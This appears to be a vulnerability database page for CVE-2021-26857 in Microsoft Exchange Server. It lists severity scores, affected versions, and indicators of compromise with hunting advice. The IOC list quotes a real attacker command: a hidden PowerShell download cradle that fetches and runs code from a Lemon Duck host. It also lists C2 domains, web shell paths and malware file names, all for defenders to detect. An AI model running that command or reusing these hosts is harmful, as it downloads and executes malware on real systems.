cbcvebase.
CVE-2021-26857
published 2021-03-03

CVE-2021-26857: Microsoft Exchange Server Remote Code Execution Vulnerability

PriorityP192high7.8CVSS 3.1
AVLACLPRNUIRSUCHIHAH
KEVITWEXPLOITRansomwareInitial access
CISA Known Exploited Vulnerabilitydue 2022-05-03
Exploited in the wild
EPSS
94.01%
99.8th percentile
Microsoft Exchange Server Remote Code Execution Vulnerability

Affected

52 ranges· showing 25
VendorProductVersion rangeFixed in
microsoftexchange_server
microsoftexchange_server
microsoftexchange_server
microsoftexchange_server
microsoftmicrosoft_exchange_server_2010_service_pack_3>= 14.0.0.0 < publicationpublication
microsoftmicrosoft_exchange_server_2013_cumulative_update_21>= 15.00.0 < publicationpublication
microsoftmicrosoft_exchange_server_2013_cumulative_update_22>= 15.00.0 < publicationpublication
microsoftmicrosoft_exchange_server_2013_cumulative_update_23>= 15.00.0 < publicationpublication
microsoftmicrosoft_exchange_server_2013_service_pack_1>= 15.00.0 < publicationpublication
microsoftmicrosoft_exchange_server_2016_cumulative_update_10>= 15.01.0 < publicationpublication
microsoftmicrosoft_exchange_server_2016_cumulative_update_11>= 15.01.0 < publicationpublication
microsoftmicrosoft_exchange_server_2016_cumulative_update_12>= 15.01.0 < publicationpublication
microsoftmicrosoft_exchange_server_2016_cumulative_update_13>= 15.01.0 < publicationpublication
microsoftmicrosoft_exchange_server_2016_cumulative_update_14>= 15.01.0 < publicationpublication
microsoftmicrosoft_exchange_server_2016_cumulative_update_15>= 15.01.0 < publicationpublication
microsoftmicrosoft_exchange_server_2016_cumulative_update_16>= 15.01.0 < publicationpublication
microsoftmicrosoft_exchange_server_2016_cumulative_update_17>= 15.01.0 < publicationpublication
microsoftmicrosoft_exchange_server_2016_cumulative_update_18>= 15.01.0 < publicationpublication
microsoftmicrosoft_exchange_server_2016_cumulative_update_19>= 15.01.0 < publicationpublication
microsoftmicrosoft_exchange_server_2016_cumulative_update_8>= 15.01.0 < publicationpublication
microsoftmicrosoft_exchange_server_2016_cumulative_update_9>= 15.01.0 < publicationpublication
microsoftmicrosoft_exchange_server_2019>= 15.02.0 < publicationpublication
microsoftmicrosoft_exchange_server_2019_cumulative_update_1>= 15.02.0 < publicationpublication
microsoftmicrosoft_exchange_server_2019_cumulative_update_2>= 15.02.0 < publicationpublication
microsoftmicrosoft_exchange_server_2019_cumulative_update_3>= 15.02.0 < publicationpublication

Detection & IOCsextracted from sources · hover to see the quote

ip45.76.84.36
domainmail.prowesoo.com
hashf32866258b67f041dc7858a59ea8afcd1297579ef50d4ebcec8775c816eb2da9
hash5d803a47d6bb7f68d4e735262bb7253def6aaab03122b05fec468865a1babe32
hashab678bbd30328e20faed53ead07c2f29646eb8042402305264388543319e949c
pathC:\inetpub\wwwroot\aspnet_client\client.aspx
pathC:\inetpub\wwwroot\aspnet_client\discover.aspx
filenamediscover.aspx
path\inetpub\wwwroot\aspnet_client\system_web\
path\FrontEnd\HttpProxy\owa\auth\
filename1302992a.aspx
filenameHttpProxy.aspx
filenamemsf.exe
filenameSRVCON.OCX
filenamerapi.dll
otherHTML.Exploit.CVE-2021-26855
otherHTML.Webshell.Hafnium
otherWin32.Backdoor.Hafnium
otherWin32.Ransom.DearCry
domaint.hwqloan.com
domaind.hwqloan.com
domaint.ouler.cc
domainps2.jusanrihua.com
domaint.netcatkit.com
domaint.bb3u9.com
urlhttp://t.bb3u9.com/7p.php?1.0*ipc*SYSTEM**+[Environment]::OSVersion.version.Major
urlhttp://t.hwqloan.com/t.txt
hash6be5847c5b80be8858e1ff0ece401851886428b1f22444212250133d49b5ee30
commandpowershell -w hidden IEX(New-Object Net.WebClient).DownLoadString('http://t.bb3u9.com/7p.php?1.0*ipc*SYSTEM**+[Environment]::OSVersion.version.Major);bpu ('http://t.bb3u9.com/ipc.jsp?1.0')
  • Hunt for web shells dropped in Exchange aspnet_client directories — specifically client.aspx and discover.aspx — as indicators of post-exploitation activity following CVE-2021-26857 exploitation.
  • Inspect \inetpub\wwwroot\aspnet_client\system_web\ and \FrontEnd\HttpProxy\owa\auth\ for any .aspx files not part of the standard Exchange Server installation.
  • CVE-2021-26857 is an insecure deserialization vulnerability in the Exchange Unified Messaging service that allows SYSTEM-level code execution; monitor for anomalous child processes spawned by the Unified Messaging service.
  • Alert on and block connections to the PlugX C2 IP 91.220.203.86 and associated domains (yolkish.com, rawfuns.com); increased victim traffic to this IP from Exchange-hosting IPs is a strong indicator of compromise.
  • Detect DLL search-order hijacking post-exploitation: look for SRVCON.OCX (PlugX loader) and rapi.dll (Whitebird loader) loaded by legitimate executables on Exchange servers.
  • Monitor for Lemon Duck post-exploitation PowerShell download cradles using hidden window flag (-w hidden) and IEX with Net.WebClient targeting Exchange servers; correlate with DNS queries to hwqloan.com, ouler.cc, and jusanrihua.com.
  • Patching Exchange does NOT remove already-implanted web shells; after patching, actively scan for and remove web shells in known drop paths to prevent persistent attacker access and piggybacking by secondary threat actors.
  • ·CVE-2021-26857 (insecure deserialization in Unified Messaging) requires either administrator-level credentials or chaining with CVE-2021-26855 (SSRF/auth bypass) to exploit; it cannot be exploited standalone without prior authentication or privilege.
  • ·Tenable's IOC plugin (ID 147193) only triggers when potential IOCs are found in identified Exchange Server paths; a non-trigger result does not confirm the server is uncompromised, only that no IOCs were found in scanned directories.

CVSS provenance

nvdv3.17.8HIGHCVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
nvdv2.06.8MEDIUMAV:N/AC:M/Au:N/C:P/I:P/A:P
vulncheck7.8HIGH
cisa7.8HIGH
vendor_msrc9.1CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.